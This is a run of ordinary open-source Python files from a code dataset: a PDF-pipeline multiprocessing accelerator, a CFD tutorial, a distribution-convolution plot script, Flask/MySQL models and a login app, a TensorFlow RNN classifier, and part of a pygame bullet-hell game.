\n\n Examples\n --------\n\n ```python\n docs = list(\n pipeline.pipe(\n [content1, content2, ...],\n accelerator={\n \"@accelerator\": \"multiprocessing\",\n \"num_cpu_workers\": 3,\n \"num_gpu_workers\": 2,\n \"batch_size\": 8,\n },\n )\n )\n ```\n\n Parameters\n ----------\n batch_size: int\n Number of documents to process at a time in a CPU/GPU worker\n num_cpu_workers: int\n Number of CPU workers. A CPU worker handles the non deep-learning components\n and the preprocessing, collating and postprocessing of deep-learning components.\n num_gpu_workers: Optional[int]\n Number of GPU workers. A GPU worker handles the forward call of the\n deep-learning components.\n gpu_pipe_names: Optional[List[str]]\n List of pipe names to accelerate on a GPUWorker, defaults to all pipes\n that inherit from TrainablePipe\n \"\"\"\n\n def __init__(\n self,\n batch_size: int,\n num_cpu_workers: Optional[int] = None,\n num_gpu_workers: Optional[int] = None,\n gpu_pipe_names: Optional[List[str]] = None,\n gpu_worker_devices: Optional[List[Union[torch.device, str]]] = None,\n cpu_worker_devices: Optional[List[Union[torch.device, str]]] = None,\n ):\n self.batch_size = batch_size\n self.num_gpu_workers: Optional[int] = num_gpu_workers\n self.num_cpu_workers = num_cpu_workers\n self.gpu_pipe_names = gpu_pipe_names\n self.gpu_worker_devices = gpu_worker_devices\n self.cpu_worker_devices = cpu_worker_devices\n\n def __call__(\n self,\n inputs: Iterable[Any],\n model: Any,\n to_doc: ToDoc = FromDictFieldsToDoc(\"content\"),\n from_doc: FromDoc = lambda doc: doc,\n ):\n \"\"\"\n Stream of documents to process. Each document can be a string or a tuple\n\n Parameters\n ----------\n inputs\n model\n\n Yields\n ------\n Any\n Processed outputs of the pipeline\n \"\"\"\n if torch.multiprocessing.get_start_method() != \"spawn\":\n torch.multiprocessing.set_start_method(\"spawn\", force=True)\n\n gpu_pipe_names = (\n [\n name\n for name, component in model.pipeline\n if isinstance(component, TrainablePipe)\n ]\n if self.gpu_pipe_names is None\n else self.gpu_pipe_names\n )\n\n if not all(model.has_pipe(name) for name in gpu_pipe_names):\n raise ValueError(\n \"GPU accelerated pipes {} could not be found in the model\".format(\n sorted(set(model.pipe_names) - set(gpu_pipe_names))\n )\n )\n\n num_devices = torch.cuda.device_count()\n print(f\"Number of available devices: {num_devices}\", flush=True)\n\n num_cpu_workers = self.num_cpu_workers\n num_gpu_workers = self.num_gpu_workers\n\n if num_gpu_workers is None:\n num_gpu_workers = num_devices if len(gpu_pipe_names) > 0 else 0\n\n if num_cpu_workers is None:\n num_cpu_workers = max(\n min(mp.cpu_count() - num_gpu_workers, DEFAULT_MAX_CPU_WORKERS), 0\n )\n\n if num_gpu_workers == 0:\n gpu_pipe_names = []\n\n gpu_worker_devices = (\n [\n torch.device(f\"cuda:{gpu_idx * num_devices // num_gpu_workers}\")\n for gpu_idx in range(num_gpu_workers)\n ]\n if self.gpu_worker_devices is None\n else self.gpu_worker_devices\n )\n cpu_worker_devices = (\n [\"cpu\"] * num_cpu_workers\n if self.cpu_worker_devices is None\n else self.cpu_worker_devices\n )\n assert len(cpu_worker_devices) == num_cpu_workers\n assert len(gpu_worker_devices) == num_gpu_workers\n if num_cpu_workers == 0:\n (\n num_cpu_workers,\n num_gpu_workers,\n cpu_worker_devices,\n gpu_worker_devices,\n gpu_pipe_names,\n ) = (num_gpu_workers, 0, gpu_worker_devices, [], [])\n\n debug(f\"Number of CPU workers: {num_cpu_workers}\")\n debug(f\"Number of GPU workers: {num_gpu_workers}\")\n\n exchanger = Exchanger(\n 
num_stages=len(gpu_pipe_names),\n num_cpu_workers=num_cpu_workers,\n num_gpu_workers=num_gpu_workers,\n gpu_worker_devices=gpu_worker_devices,\n )\n\n cpu_workers = []\n gpu_workers = []\n model = model.to(\"cpu\")\n\n for gpu_idx in range(num_gpu_workers):\n gpu_workers.append(\n GPUWorker(\n gpu_idx=gpu_idx,\n exchanger=exchanger,\n gpu_pipe_names=gpu_pipe_names,\n model=model,\n device=gpu_worker_devices[gpu_idx],\n )\n )\n\n for cpu_idx in range(num_cpu_workers):\n cpu_workers.append(\n CPUWorker(\n cpu_idx=cpu_idx,\n exchanger=exchanger,\n gpu_pipe_names=gpu_pipe_names,\n model=model,\n device=cpu_worker_devices[cpu_idx],\n )\n )\n\n for worker in (*cpu_workers, *gpu_workers):\n worker.start()\n\n try:\n num_max_enqueued = num_cpu_workers * 2 + 10\n # Number of input/output batch per process\n total_inputs = [0] * num_cpu_workers\n total_outputs = [0] * num_cpu_workers\n outputs_iterator = exchanger.iter_results()\n\n cpu_worker_indices = list(range(num_cpu_workers))\n inputs_iterator = (to_doc(i) for i in inputs)\n for i, pdfs_batch in enumerate(batchify(inputs_iterator, self.batch_size)):\n if sum(total_inputs) - sum(total_outputs) >= num_max_enqueued:\n outputs, cpu_idx, gpu_idx = next(outputs_iterator)\n if isinstance(outputs, BaseException):\n raise outputs # pragma: no cover\n yield from (from_doc(o) for o in outputs)\n total_outputs[cpu_idx] += 1\n\n # Shuffle to ensure the first process does not receive all the documents\n # in case of total_inputs - total_outputs equality\n shuffle(cpu_worker_indices)\n cpu_idx = min(\n cpu_worker_indices,\n key=lambda i: total_inputs[i] - total_outputs[i],\n )\n exchanger.put_cpu(pdfs_batch, stage=0, idx=cpu_idx)\n total_inputs[cpu_idx] += 1\n\n while sum(total_outputs) < sum(total_inputs):\n outputs, cpu_idx, gpu_idx = next(outputs_iterator)\n if isinstance(outputs, BaseException):\n raise outputs # pragma: no cover\n yield from (from_doc(o) for o in outputs)\n total_outputs[cpu_idx] += 1\n finally:\n # Send gpu and cpu process the order to stop processing data\n # We use the prioritized queue to ensure the stop signal is processed\n # before the next batch of data\n for i, worker in enumerate(gpu_workers):\n exchanger.gpu_inputs_queues[i][-1].put(None)\n debug(\"Asked gpu worker\", i, \"to stop processing data\")\n for i, worker in enumerate(cpu_workers):\n exchanger.cpu_inputs_queues[i][-1].put(None)\n debug(\"Asked cpu worker\", i, \"to stop processing data\")\n\n # Enqueue a final non prioritized STOP signal to ensure there remains no\n # data in the queues (cf drain loop in CPUWorker / GPUWorker)\n for i, worker in enumerate(gpu_workers):\n exchanger.gpu_inputs_queues[i][0].put(None)\n debug(\"Asked gpu\", i, \"to end\")\n for i, worker in enumerate(gpu_workers):\n worker.join(timeout=5)\n debug(\"Joined gpu worker\", i)\n for i, worker in enumerate(cpu_workers):\n exchanger.cpu_inputs_queues[i][0].put(None)\n debug(\"Asked cpu\", i, \"to end\")\n for i, worker in enumerate(cpu_workers):\n worker.join(timeout=1)\n debug(\"Joined cpu worker\", i)\n\n # If a worker is still alive, kill it\n # This should not happen, but for a reason I cannot explain, it does in\n # some CPU workers sometimes when we catch an error, even though each run\n # method of the workers completes cleanly. 
Maybe this has something to do\n # with the cleanup of these processes ?\n for i, worker in enumerate(gpu_workers): # pragma: no cover\n if worker.is_alive():\n print(\"Killing gpu worker\", i)\n worker.kill()\n for i, worker in enumerate(cpu_workers): # pragma: no cover\n if worker.is_alive():\n print(\"Killing cpu worker\", i)\n worker.kill()\n","repo_name":"aphp/edspdf","sub_path":"edspdf/accelerators/multiprocessing.py","file_name":"multiprocessing.py","file_ext":"py","file_size_in_byte":20408,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"99"} +{"seq_id":"31174746224","text":"import sys\nimport numpy \nfrom pyranda import pyrandaSim, pyrandaBC, pyrandaTimestep, pyrandaIBM\n\n\n\n## Define a mesh\nNpts = 64\nL = numpy.pi * 2.0 \ndim = 2\ngamma = 1.4\n\nproblem = 'cylinder'\n\nLp = L * (Npts-1.0) / Npts\n\nsys.path.append('../')\nfrom meshTest import zoomMesh_solve\ndxf = 4*Lp / float(Npts) * .3\nxS = zoomMesh_solve(Npts,-2.*Lp,2.*Lp,-2.,2.,1.0,dxf)\n\ndef zoomMesh(i,j,k):\n x = xS[i]\n y = xS[j]\n z = 0.0\n return x,y,z\n\nmesh_options = {}\nmesh_options['coordsys'] = 3\nmesh_options['function'] = zoomMesh\nmesh_options['periodic'] = numpy.array([False, False, True])\nmesh_options['gridPeriodic'] = numpy.array([False, False, False])\nmesh_options['dim'] = 3\nmesh_options['x1'] = [ -2*Lp , -2*Lp , 0.0 ]\nmesh_options['xn'] = [ 2*Lp , 2*Lp , Lp ]\nmesh_options['nn'] = [ Npts, Npts , 1 ]\n\n\n# Initialize a simulation object on a mesh\nss = pyrandaSim(problem,mesh_options)\nss.addPackage( pyrandaBC(ss) )\nss.addPackage( pyrandaIBM(ss) )\nss.addPackage( pyrandaTimestep(ss) )\n\n\nrho0 = 1.0\np0 = 1.0\ngamma = 1.4\nmach = 2.0\ns0 = numpy.sqrt( p0 / rho0 * gamma )\nu0 = s0 * mach\ne0 = p0/(gamma-1.0) + rho0*.5*u0*u0\n\n\n# Define the equations of motion\neom =\"\"\"\n# Primary Equations of motion here\nddt(:rho:) = -div(:rho:*:u:, :rho:*:v:)\nddt(:rhou:) = -div(:rhou:*:u: + :p: - :tau:, :rhou:*:v:)\nddt(:rhov:) = -div(:rhov:*:u:, :rhov:*:v: + :p: - :tau:)\nddt(:Et:) = -div( (:Et: + :p: - :tau:)*:u: - :tx:*:kappa:, (:Et: + :p: - :tau:)*:v: - :ty:*:kappa: )\n# Level set equation\n#ddt(:phi:) = - :gx: * :u1: - :gy: * :v1: \n# Conservative filter of the EoM\n:rho: = fbar( :rho: )\n:rhou: = fbar( :rhou: )\n:rhov: = fbar( :rhov: )\n:Et: = fbar( :Et: )\n# Update the primatives and enforce the EOS\n:u: = :rhou: / :rho:\n:v: = :rhov: / :rho:\n:p: = ( :Et: - .5*:rho:*(:u:*:u: + :v:*:v:) ) * ( :gamma: - 1.0 )\n:T: = :p: / (:rho: * :R: )\n# Artificial bulk viscosity (old school way)\n:div: = div(:u:,:v:)\n:beta: = gbar( ring(:div:) * :rho: ) * 7.0e-3\n:tau: = :beta: * :div: \n[:tx:,:ty:,:tz:] = grad(:T:)\n:kappa: = gbar( ring(:T:)* :rho:*:cv:/(:T: * :dt: ) ) * 1.0e-3\n# Apply BCs and internal IBM\n[:u:,:v:,:w:] = ibmV( [:u:,:v:,0.0], :phi:, [:gx:,:gy:,:gz:], [:u1:,:u2:,0.0] )\n:rho: = ibmS( :rho: , :phi:, [:gx:,:gy:,:gz:] )\n:p: = ibmS( :p: , :phi:, [:gx:,:gy:,:gz:] )\nbc.extrap(['rho','p','u'],['xn'])\nbc.const(['u'],['x1','y1','yn'],u0)\nbc.const(['v'],['x1','xn','y1','yn'],0.0)\nbc.const(['rho'],['x1','y1','yn'],rho0)\nbc.const(['p'],['x1','y1','yn'],p0)\n:Et: = :p: / ( :gamma: - 1.0 ) + .5*:rho:*(:u:*:u: + :v:*:v:)\n:rhou: = :rho:*:u:\n:rhov: = :rho:*:v:\n:cs: = sqrt( :p: / :rho: * :gamma: )\n:dt: = dt.courant(:u:,:v:,:w:,:cs:)\n:dtB: = 0.2* dt.diff(:beta:,:rho:)\n:dt: = numpy.minimum(:dt:,:dtB:)\n:umag: = sqrt( :u:*:u: + :v:*:v: )\n\"\"\"\neom = eom.replace('u0',str(u0)).replace('p0',str(p0)).replace('rho0',str(rho0))\n\n\n# Add the EOM to the 
solver\nss.EOM(eom)\n\n\n# Initialize variables\nic = \"\"\"\n:gamma: = 1.4\n:R: = 1.0\n:cp: = :R: / (1.0 - 1.0/:gamma: )\n:cv: = :cp: - :R:\n#rad = sqrt( (meshx-pi)**2 + (meshy-pi)**2 ) \nrad = sqrt( meshx**2 + meshy**2 ) \n:phi: = rad - pi/4.0\n:rho: = 1.0 + 3d()\n:p: = 1.0 + 3d() #exp( -(meshx-1.5)**2/.25**2)*.1\n:u: = where( :phi:>0.5, mach * sqrt( :p: / :rho: * :gamma:) , 0.0 )\n#:u: = mach * sqrt( :p: / :rho: * :gamma:)\n:u: = gbar( gbar( :u: ) )\n:v: = 0.0 + 3d()\n:Et: = :p:/( :gamma: - 1.0 ) + .5*:rho:*(:u:*:u: + :v:*:v:)\n:rhou: = :rho:*:u:\n:rhov: = :rho:*:v:\n:cs: = sqrt( :p: / :rho: * :gamma: )\n:dt: = dt.courant(:u:,:v:,:w:,:cs:)\n[:gx:,:gy:,:gz:] = grad( :phi: )\n:gx: = gbar( :gx: )\n:gy: = gbar( :gy: )\n\"\"\"\nic = ic.replace('mach',str(mach))\n\n# Set the initial conditions\nss.setIC(ic)\n \n\n# Write a time loop\ntime = 0.0\nviz = True\n\n# Approx a max dt and stopping time\ntt = 3.0 #\n\n# Start time loop\ncnt = 1\nviz_freq = 100\npvar = 'umag'\n\nCFL = 1.0\ndt = ss.var('dt').data * CFL*.01\nwvars = ['p','rho','u','v','phi']\nss.write( wvars )\nwhile tt > time:\n \n # Update the EOM and get next dt\n time = ss.rk4(time,dt)\n dt = min( ss.variables['dt'].data * CFL, dt*1.1)\n dt = min(dt, (tt - time) )\n \n # Print some output\n ss.iprint(\"%s -- %s --- %f\" % (cnt,time,dt) )\n cnt += 1\n if (cnt%viz_freq == 1) :\n ss.write(wvars)\n \n\nss.writeRestart()\n \n\n","repo_name":"EduardoMolina/pyranda","sub_path":"examples/tutorials/cylinder.py","file_name":"cylinder.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"99"} +{"seq_id":"22461927708","text":"import scipy.special\nimport scipy.signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats\n\n\ndef st_pdf(x, mu, sigma, nu):\n return scipy.special.gamma((nu + 1) / 2) / (\n sigma * np.sqrt(nu * np.pi) * scipy.special.gamma(nu / 2)) * \\\n np.power(1 + ((x - mu) / sigma) ** 2 / nu, -(nu + 1) / 2)\n\ndef uniform_pdf(x, a, b):\n return scipy.stats.uniform(loc=a,scale=b-a).pdf(x)\n\ndef vg_pdf(x, mu, sigma, kappa, theta):\n horizon = 1\n coeff_1 = np.sqrt(2) * np.exp(theta * (x - mu * horizon) / (2 * sigma ** 2)) \\\n / (sigma * np.sqrt(np.pi) * kappa ** (horizon / kappa) * scipy.special.gamma(\n horizon / kappa))\n coeff_2 = np.power(np.abs(x - mu * horizon) / np.sqrt(2 * sigma ** 2 / kappa + theta ** 2),\n horizon / kappa - 0.5)\n bessel_order = horizon / kappa - 0.5\n bessel_param = np.abs(x - mu * horizon) * np.sqrt(\n 2 * sigma ** 2 / kappa + theta ** 2) / sigma ** 2\n bessel = scipy.special.kv(bessel_order, bessel_param)\n res = coeff_1 * coeff_2 * bessel\n return res\n\n# mu = 0\n# nu = 3\n# sigma_norm = np.sqrt(5)\n# sigma = sigma_norm/np.sqrt(nu)\n\nmu = 0.0002621652698799067\nsigma = 0.009228227387922006\nnu = 2.809213663439115\nsigma_norm = np.sqrt(nu) * sigma\n\nx = np.linspace(-10, 10, 100000)\npdf = st_pdf(x, mu, sigma, nu)\n#pdf = vg_pdf(x, 0, np.sqrt(5), 0.5, 0)\n#pdf = uniform_pdf(x, -1, 1)\ndelta = x[1] - x[0]\nlast_pmf = pdf * delta\none_pmf = pdf * delta\nplt.plot(x, last_pmf / delta, label=\"PDF, n = 0\")\nfor i in range(1, 255):\n last_pmf = scipy.signal.fftconvolve(one_pmf, last_pmf, 'same')\n last_pdf = last_pmf / delta\n if i == 1 or i == 50 or i == 100 or i == 254:\n plt.plot(x/np.sqrt(i+1), last_pdf * np.sqrt(i+1), label=\"PDF, n = %s\" % (i))\nplt.plot(x, scipy.stats.norm.pdf(x, mu, sigma_norm), 'k-', label='N')\nplt.xlim([-0.2, 0.2])\nplt.ylim([1e-3, 
100])\nplt.yscale('log')\nplt.legend()\nplt.show()","repo_name":"antdvid/LongTermVaR","sub_path":"TestConvergenceOfConvolution.py","file_name":"TestConvergenceOfConvolution.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"893677178","text":"from unittest import result\nfrom flask_app.config.mysqlconnection import connectToMySQL\n\n\nclass Dojo:\n def __init__(self, data):\n self.id = data[\"id\"]\n self.name = data[\"name\"]\n self.created_at = data[\"created_at\"]\n self.updated_at = data[\"updated_at\"]\n\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO dojos (name, created_at ,updated_at) VALUES (%(name)s, NOW(),NOW());\"\n result = connectToMySQL(\"dojo_ninjas\").query_db(query, data)\n return result\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM dojos;\"\n results = connectToMySQL(\"dojo_ninjas\").query_db(query)\n result = []\n for dojo in results:\n result.append(cls(dojo))\n return result\n\n @classmethod\n def get_one(cls, data):\n query = \"SELECT * FROM dojos WHERE id = %(id)s;\"\n result = connectToMySQL(\"dojo_ninjas\").query_db(query, data)\n return cls(result[0])\n","repo_name":"ExploreAdrift/Python","sub_path":"flask_mysql/dojo_ninjas/flask_app/models/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1884027575","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: rnn.py\n# Author: Qian Ge \n\nimport tensorflow as tf\n\nfrom tensorcv.models.base import BaseModel\nimport tensorcv.models.layers as L\n\nfrom ..model.layers import rnn_layer\n\n\nclass RNNClassification(BaseModel):\n def __init__(self, n_class,\n cell_type,\n hidden_size_list,\n max_grad_norm,\n rnn_construction=tf.contrib.rnn.MultiRNNCell):\n self._n_class = n_class\n self._cell_type = cell_type\n if not isinstance(hidden_size_list, list):\n hidden_size_list = [hidden_size_list]\n self._hidden_size_list = hidden_size_list\n self._max_grad_norm = max_grad_norm\n self._construction = rnn_construction\n\n self.set_is_training(True)\n self.layer = {}\n\n def create_model(self, input_dict):\n self._input_dict = input_dict\n self._create_model()\n\n def _create_model(self):\n with tf.name_scope('input'):\n inputs = self._input_dict['data']\n keep_prob = self._input_dict['keep_prob']\n\n outputs, state, out_size = rnn_layer(\n inputs,\n self._hidden_size_list,\n forget_bias=1.0,\n init_state=None,\n is_training=self.is_training,\n keep_prob=keep_prob,\n cell_type=self._cell_type,\n rnn_construction=self._construction,\n name='rnn_layer')\n\n outputs = outputs[:, -1, :]\n outputs = tf.reshape(outputs, [-1, out_size])\n logits = L.fc(outputs, self._n_class, name='softmax')\n prediction = tf.nn.softmax(logits)\n\n self.layer['logits'] = logits\n self.layer['prediction'] = prediction\n\n def _get_loss(self):\n label = self._input_dict['label']\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=self.layer['logits'], labels=label))\n return self.loss\n\n def _get_optimizer(self):\n lr = self._input_dict['lr']\n return tf.train.RMSPropOptimizer(learning_rate=lr)\n\n def get_train_op(self):\n with tf.name_scope('train_op'):\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(\n tf.gradients(self._get_loss(), tvars),\n self._max_grad_norm)\n grads = zip(grads, tvars)\n\n opt = self._get_optimizer()\n 
train_op = opt.apply_gradients(grads)\n return train_op\n\n def get_accuracy(self):\n label = tf.argmax(self._input_dict['label'], axis=1)\n pred = tf.argmax(self.layer['prediction'], axis=1)\n correct_pred = tf.equal(label, pred)\n return tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n","repo_name":"conan7882/construct-deep-rnn","sub_path":"lib/net/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"17009077127","text":"\"\"\"\r\nuse flaskDB;\r\nDROP TABLE IF EXISTS account;\r\ncreate table account(\r\n id varchar(32),\r\n pw varchar(64) not null,\r\n salt varchar(20) not null,\r\n name varchar(32),\r\n primary key(id)\r\n);\r\ninsert into account values(\"hosokawa\", \"b2ea30c8186d1e551d857d0d40e7e6e10e19c7dd540519478ea4e2a3d511a2dc\",\"kmrsmtCDmGKIfFRz7Fde\", \"細川\");\r\ninsert into account values(\"takahashi\", \"a52f8e280c28c90fa289b5a596398b6c36ff1aa01faf9df02f248a22a24be04f\",\"oz8ywexdbVUIX9jNE8kK\", \"高橋\");\r\ninsert into account values(\"takada\", \"2bb9d9ad9a1aac7e678b94625109ff7fa4e8de127279b96a6f8cbae56a953b68\",\"uJpZeg3iLU2DfmnO9DkG\", \"髙田\");\r\n\r\npassword:morijyobi\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template, request, redirect, session\r\nimport random\r\nimport string\r\nimport db\r\nfrom datetime import timedelta \r\n\r\n\r\napp = Flask(__name__)\r\n#Flaskクラスのインスタンスに秘密鍵(256桁のランダムな英文字列)を設定.\r\napp.secret_key = \"\".join(random.choices(string.ascii_letters, k=256))\r\n\r\n@app.route(\"/\")\r\ndef top_page():\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/home\", methods=['POST'])\r\ndef home():\r\n id = request.form.get(\"id\")\r\n pw = request.form.get(\"pw\")\r\n\r\n # ログイン認証業務ロジック\r\n result = db.login(id, pw)\r\n\r\n if result != None:\r\n session[\"user\"] = True # セッションにキー:user、バリュー:Trueを格納します。\r\n session.permanent = True # セッションの有効期限有効化\r\n app.permanent_session_lifetime = timedelta(minutes=30) # 有効期限の値の設定\r\n return render_template(\"home.html\")\r\n else:\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/home\", methods=['GET'])\r\ndef home_get():\r\n # セッションにログイン情報があるか確認\r\n if \"user\" in session:\r\n return render_template(\"home.html\")\r\n else:\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/menu\")\r\ndef menu():\r\n if \"user\" in session:\r\n return render_template(\"menu.html\")\r\n else:\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/logout\")\r\ndef logout():\r\n session.pop(\"user\", None) # セッションの削除\r\n return render_template(\"index.html\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"hosokawa3217/flask_login_sample","sub_path":"app_session.py","file_name":"app_session.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72778023685","text":"from sys import path\nimport pygame\nimport random\nimport os\nfrom pygame.constants import MOUSEBUTTONDOWN\n\nfrom pygame.sprite import groupcollide, spritecollideany\nfrom pygame.time import delay\n\n\n\n# 初始化\npygame.init()\npygame.mixer.init()\ntime = pygame.time.Clock()\nupdating = True\n\nf = open(os.path.join(\"Grade\", \"H_Grade.txt\"), mode='r')\nhscore = f.read()\nf.close()\n\n\n\nFPS = 60\nenemy_wait = 0\nE_Health = 1000\nplayer_heart = 3\nScore = 0\nMusic_On = True\n\n\nGAMESTEP = 0\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = 
(0, 255, 0)\nBLUE = (0, 0, 255)\nWIDTH = 1000\nHEIGHT = 800\nP_WIDTH = 600\n\n\n\n\n# 定義視窗\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"東方Project\")\n\n#圖片讀取\nframe_IMG = pygame.image.load(os.path.join(\"img\", \"TESTBG.jpg\")).convert()\nEnemy_IMG = pygame.image.load(os.path.join(\"img\", \"Patchouli.png\")).convert()\nPlayer_IMG = pygame.image.load(os.path.join(\"img\", \"player.png\")).convert()\nF_Bullet_IMG = pygame.image.load(os.path.join(\"img\", \"F_Bullet.png\")).convert()\nE_Bullet_IMG = pygame.image.load(os.path.join(\"img\", \"E_Bullet.png\")).convert()\nP_Heart_IMG = pygame.image.load(os.path.join(\"img\", \"Heart.jpg\")).convert()\nP_Heart_IMG.set_colorkey(WHITE)\nE_Health_H_IMG = pygame.image.load(os.path.join(\"img\", \"life_H.png\")).convert()\nE_Health_M_IMG = pygame.image.load(os.path.join(\"img\", \"life_M.png\")).convert()\nE_Health_E_IMG = pygame.image.load(os.path.join(\"img\", \"life_E.png\")).convert()\nE_Health_H_IMG.set_colorkey(WHITE)\nE_Health_M_IMG.set_colorkey(WHITE)\nE_Health_E_IMG.set_colorkey(WHITE)\nTitle_IMG = pygame.image.load(os.path.join(\"img\", \"title.png\")).convert()\nStartButtom_IMG = pygame.image.load(os.path.join(\"img\", \"startbuttom.jpg\")).convert()\nMusicOn_IMG = pygame.image.load(os.path.join(\"img\", \"music_on.jpg\")).convert()\nMusicOFF_IMG = pygame.image.load(os.path.join(\"img\", \"music_off.jpg\")).convert()\nGoodEnd_IMG = pygame.image.load(os.path.join(\"img\", \"GE.png\")).convert()\nBadEnd_IMG = pygame.image.load(os.path.join(\"img\", \"BE.png\")).convert()\nReStartButtom_IMG = pygame.image.load(os.path.join(\"img\", \"re.jpg\")).convert()\n\n\n#音效\nMenu_Bgm = pygame.mixer.Sound(os.path.join(\"sound\", \"start_bgm.mp3\"))\nGame_Bgm = pygame.mixer.Sound(os.path.join(\"sound\", \"game_bgm.mp3\"))\n\n\n\n\nfont_name = pygame.font.match_font('arial')\n\n\ndef score_text(surf, text, size, x, y):\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, BLUE)\n text_rect = text_surface.get_rect()\n text_rect.centerx = x\n text_rect.top = y\n surf.blit(text_surface, text_rect)\n\ndef BS_text(surf, text, size, x, y):\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, BLUE)\n text_rect = text_surface.get_rect()\n text_rect.centerx = x\n text_rect.top = y\n surf.blit(text_surface, text_rect)\n\n\n# 角色\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n #self.image = pygame.Surface((40, 40))\n self.image = Player_IMG\n self.image.set_colorkey(WHITE)\n self.rect = self.image.get_rect()\n self.radius = 10\n self.rect.centerx = P_WIDTH/2\n self.rect.bottom = HEIGHT - 70\n self.speed = 5 \n self.FireTime = 0\n\n def update(self):\n # 按鍵捕捉及移動\n key_pressed = pygame.key.get_pressed()\n if key_pressed[pygame.K_SPACE] and self.FireTime == 0:\n self.fire()\n self.FireTime = 3\n if key_pressed[pygame.K_LSHIFT]:\n self.speed = 10\n else :\n self.speed = 5\n if key_pressed[pygame.K_RIGHT]:\n self.rect.x += self.speed\n if key_pressed[pygame.K_LEFT]:\n self.rect.x -= self.speed\n if key_pressed[pygame.K_UP]:\n self.rect.y -= self.speed\n if key_pressed[pygame.K_DOWN]:\n self.rect.y += self.speed\n # 邊界移動限制\n if self.rect.right > P_WIDTH:\n self.rect.right = P_WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.top < 0:\n self.rect.top = 0\n if self.rect.bottom > HEIGHT:\n self.rect.bottom = HEIGHT\n if self.FireTime > 0:\n self.FireTime -= 1\n \n\n def fire(self):\n bullet = 
F_bullet(self.rect.centerx, self.rect.bottom - 60)\n all_sprite.add(bullet)\n bullets.add(bullet)\n\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(Enemy_IMG, (70,70))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = 30\n self.rect.centerx = P_WIDTH/2\n self.rect.centery = -50\n self.speedx = 1\n self.speedy = 1\n self.time = 0\n self.fireTime = 0\n self.settingPlace = False\n self.EnemyFireMode = 1\n self.x = 0\n self.y = 0\n self.bulletSpeed = 2\n\n def update(self):\n if self.settingPlace == False:\n self.movein()\n if self.settingPlace == True:\n if self.EnemyFireMode == 1 and self.time == 0 and self.fireTime < 600:\n for i in range(9):\n self.time = 40\n if i % 9 == 0:\n self.x = self.rect.centerx - 120\n self.y = self.rect.centery - 10\n self.fire()\n elif i % 9 == 1:\n self.x = self.rect.centerx - 80\n self.y = self.rect.centery + 20\n self.fire()\n elif i % 9 == 2:\n self.x = self.rect.centerx - 40\n self.y = self.rect.centery + 40\n self.fire()\n elif i % 9 == 3:\n self.x = self.rect.centerx \n self.y = self.rect.centery + 50\n self.fire()\n elif i % 9 == 4:\n self.x = self.rect.centerx + 40\n self.y = self.rect.centery + 40\n self.fire()\n elif i % 9 == 5:\n self.x = self.rect.centerx + 80\n self.y = self.rect.centery + 20\n self.fire()\n elif i % 9 == 6:\n self.x = self.rect.centerx + 120\n self.y = self.rect.centery - 10\n self.fire()\n elif i % 9 == 7:\n self.x = self.rect.centerx - 180\n self.y = self.rect.centery - 15\n self.fire()\n elif i % 9 == 8:\n self.x = self.rect.centerx + 180\n self.y = self.rect.centery - 15\n self.fire()\n self.time = 40\n if self.EnemyFireMode == 2 and self.time == 0 and self.fireTime < 600:\n for i in range(5):\n self.time = 30\n if i % 5 == 0:\n self.x = self.rect.centerx - 120\n self.y = self.rect.centery\n self.fire()\n elif i % 5 == 1:\n self.x = self.rect.centerx - 60\n self.y = self.rect.centery + 30\n self.fire()\n elif i % 5 == 2:\n self.x = self.rect.centerx\n self.y = self.rect.centery + 50\n self.fire()\n elif i % 5 == 3:\n self.x = self.rect.centerx + 60\n self.y = self.rect.centery + 30\n self.fire()\n elif i % 5 == 4:\n self.x = self.rect.centerx + 120\n self.y = self.rect.centery\n self.fire()\n self.time = 40\n self.fireTime += 1\n if self.time > 0:\n self.time -= 1\n if self.fireTime == 600:\n self.EnemyFireMode == 0\n elif self.fireTime > 720:\n self.fireTime = 0\n self.bulletSpeed += 1\n \n \n def movein(self):\n if self.rect.centery < 50:\n self.rect.y += 1\n else:\n self.settingPlace = True\n\n\n def fire(self):\n bullet = E_bullet(self.x, self.y, self.bulletSpeed)\n all_sprite.add(bullet)\n enemy_bullets.add(bullet)\n\nclass F_bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((10,35))\n self.image = F_Bullet_IMG\n self.image.set_colorkey(WHITE)\n #self.image.fill(BLACK)\n 